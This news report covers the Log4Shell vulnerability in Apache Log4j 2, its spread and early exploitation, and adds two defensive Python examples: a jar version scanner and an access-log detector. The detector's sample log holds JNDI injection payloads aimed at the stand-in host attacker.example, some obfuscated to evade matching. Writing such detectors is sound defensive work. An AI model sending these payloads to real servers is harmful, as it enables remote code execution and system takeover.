The flaw, an unauthenticated remote code execution vulnerability, allows the complete takeover of systems running versions 2.0-beta9 through 2.14.1 of the library.
Developed by the Apache Software Foundation, Log4j is also embedded in software that is not itself written in Java, and products from Apple, Amazon, Cloudflare, Twitter and Steam are all susceptible.
Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.
— Matthew Prince (@eastdakota) December 11, 2021
In a tweet on Saturday, British infosec expert Kevin Beaumont said he was seeing widespread exploitation against his honeypots. "...intriguingly, [there was] an attempt against an Apache box before details of this became public," he added.
Apache has released version 2.15.0 as a fix.
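As an added illustration, not part of the original report: the affected range given above (2.0-beta9 through 2.14.1, with 2.15.0 as the fix) is easy to misjudge by eye because Log4j 2 pre-release tags (alpha, beta, rc) sort before the final release of the same number. The Python below, written for this article rather than taken from Apache, orders versions the way the release line does and uses that to pick affected log4j-core jars out of a file inventory. The sample paths are constructed, and the choice to check only log4j-core jars is an assumption of the example.

```python
import os
import re
from typing import List, Tuple

# Range stated in the article: 2.0-beta9 through 2.14.1 are affected; 2.15.0 is the fix.
FIRST_AFFECTED = "2.0-beta9"
LAST_AFFECTED = "2.14.1"
FIXED_VERSION = "2.15.0"

# major.minor[.patch][-alpha|beta|rcN], the numbering scheme Log4j 2 releases use
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?$", re.IGNORECASE)
_QUALIFIER_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_RELEASE_RANK = 3  # a final release sorts after every pre-release with the same number

# Assumption for this example: only log4j-core jars are checked, since that artifact
# carries the logging implementation; the article itself only says "the library".
_CORE_JAR_RE = re.compile(r"^log4j-core-(.+)\.jar$")


def parse_version(text: str) -> Tuple[int, int, int, int, int]:
    """Turn '2.0-beta9' into a tuple that orders correctly against '2.0-rc1', '2.0' and '2.14.1'."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j 2 version string: {text!r}")
    major, minor, patch, qualifier, qnum = m.groups()
    rank = _QUALIFIER_RANK[qualifier.lower()] if qualifier else _RELEASE_RANK
    return (int(major), int(minor), int(patch or 0), rank, int(qnum or 0))


def is_affected(version: str) -> bool:
    """True when the version falls inside the affected range the article gives."""
    key = parse_version(version)
    return parse_version(FIRST_AFFECTED) <= key <= parse_version(LAST_AFFECTED)


def affected_jars(paths: List[str]) -> List[Tuple[str, str]]:
    """Filter file paths down to log4j-core jars whose version is in the affected range."""
    hits = []
    for path in paths:
        m = _CORE_JAR_RE.match(os.path.basename(path))
        if not m:
            continue  # not a log4j-core jar (log4j-api, Log4j 1.x, unrelated files)
        try:
            if is_affected(m.group(1)):
                hits.append((path, m.group(1)))
        except ValueError:
            pass  # e.g. a -sources or -javadoc jar; not a runtime artifact, so skipped
    return hits


def scan_directory(root: str) -> List[Tuple[str, str]]:
    """Walk a directory tree and report affected log4j-core jars by file name."""
    found = [os.path.join(d, f) for d, _, files in os.walk(root) for f in files]
    return affected_jars(found)


# Constructed sample inventory for the demonstration; not real hosts or findings.
SAMPLE_JAR_PATHS = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/app/lib/log4j-api-2.14.1.jar",
    "/opt/legacy/lib/log4j-core-2.0-beta9.jar",
    "/opt/legacy/lib/log4j-core-2.0-beta8.jar",
    "/opt/patched/lib/log4j-core-2.15.0.jar",
    "/opt/old/lib/log4j-1.2.17.jar",
]

if __name__ == "__main__":
    for path, version in affected_jars(SAMPLE_JAR_PATHS):
        print(f"AFFECTED  {path}  (log4j-core {version}; fix is {FIXED_VERSION})")
```

Matching on file names is only a first pass: a log4j-core jar shaded into another application's jar, or renamed, will not be seen, so a fuller inventory would open each archive and read its manifest.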
In a blog post, Satnam Narang, a staff research engineer at security shop Tenable, said Log4Shell affected, but was not limited to, Apache Druid, Apache Flink, Apache Solr, Apache Spark, Apache Struts2 and Apache Tomcat.
GreyNoise is detecting a sharply increasing number of hosts opportunistically exploiting Apache Log4J CVE-2021-44228. Exploitation occurring from ~100 distinct hosts, almost all of which are Tor exit nodes. Tags available to all users and customers now. https://t.co/JF3tUkpIrq pic.twitter.com/CTMi0IWQ5j
— GreyNoise (@GreyNoiseIO) December 10, 2021
"CVE-2021-44228 is a remote code execution vulnerability in Apache Log4j2," he said. "An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j.
"The crafted request uses a Java Naming and Directory Interface injection via a variety of services including Lightweight Directory Access Protocol, Secure LDAP, Remote Method Invocation or Domain Name Service.
"If the vulnerable server uses Log4j2 to log requests, the exploit will then request a malicious payload over JNDI through one of the services above from an attacker-controlled server. Successful exploitation could lead to RCE."
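The mechanism Narang describes, a lookup string arriving in a request and being resolved when the request is logged, is also what defenders hunt for in their own access logs. The Python below is an added example written for this article, not code from Tenable or Apache: it scans web-server log lines for JNDI lookup strings, reports the scheme (LDAP, RMI, DNS and so on) each one names, and first unwraps the URL encoding and nested case-change and default-value lookups that public detection rules normalise so that simple string matching is not defeated. The log lines are constructed, and the hostnames in them are placeholders.

```python
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote

# Nested lookups that public detection rules unwrap before matching:
# ${lower:x} / ${upper:x} case-change lookups and ${::-x} default-value lookups.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{::-([^${}]*)\}")
# A JNDI lookup with its scheme (ldap, ldaps, rmi, dns, ...), the pattern described in the article
_JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):[^{}]*\}", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    source_ip: str
    scheme: str
    lookup: str


def normalize_lookups(text: str) -> str:
    """URL-decode, then collapse nested lookups from the inside out until nothing changes."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def scan_log(log_text: str) -> List[Finding]:
    """Report every JNDI lookup string found in request log lines, one Finding per lookup."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(log_text.splitlines(), start=1):
        if not raw.strip():
            continue
        normalized = normalize_lookups(raw)
        source_ip = raw.split(" ", 1)[0]  # first field of the combined log format
        for m in _JNDI_LOOKUP.finditer(normalized):
            findings.append(Finding(line_no, source_ip, m.group(1).lower(), m.group(0)))
    return findings


# Constructed sample access log (combined format); hosts and addresses are placeholders.
# Line 5 mentions "jndi" in an ordinary path and must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET /login HTTP/1.1" 200 1042 "-" "${jndi:ldap://attacker.example:1389/a}"
10.0.0.9 - - [10/Dec/2021:14:03:01 +0000] "GET /?x=${jndi:rmi://attacker.example:1099/b} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.9 - - [10/Dec/2021:14:03:40 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${::-l}dap://attacker.example/c}"
10.0.0.7 - - [10/Dec/2021:14:04:02 +0000] "GET /docs/jndi-guide HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:14:04:30 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 404 0 "-" "curl/7.79"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.source_ip} sent a JNDI lookup over {f.scheme}: {f.lookup}")
```

A hit in the request log shows that a lookup string reached the server, not that it was resolved; whether the application actually logged that field with a vulnerable Log4j 2 decides exploitation, which is why the scan is paired with an inventory of the versions in use and with egress records for the LDAP, RMI and DNS connections a resolved lookup would make.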
The flaw was first seen affecting several versions of Minecraft, the popular sandbox video game, he added.
Amit Yoran, chairman and chief executive of Tenable, said: "The Apache Log4j Remote Code Execution Vulnerability is the single biggest, most critical vulnerability of the last decade. When all of the research is done, we may in fact learn that it is the single biggest vulnerability in the history of modern computing.
"This kind of vulnerability is a reminder that organisations must develop mature cyber security programs to understand cyber risk in a dynamic world.
"While details are still emerging, we encourage organisations to update their security controls, assume they have been compromised and activate existing incident response plans.
"The number one priority now is to work with your in-house information security and engineering teams or partner with an organisation that conducts incident response to identify the impact to your business."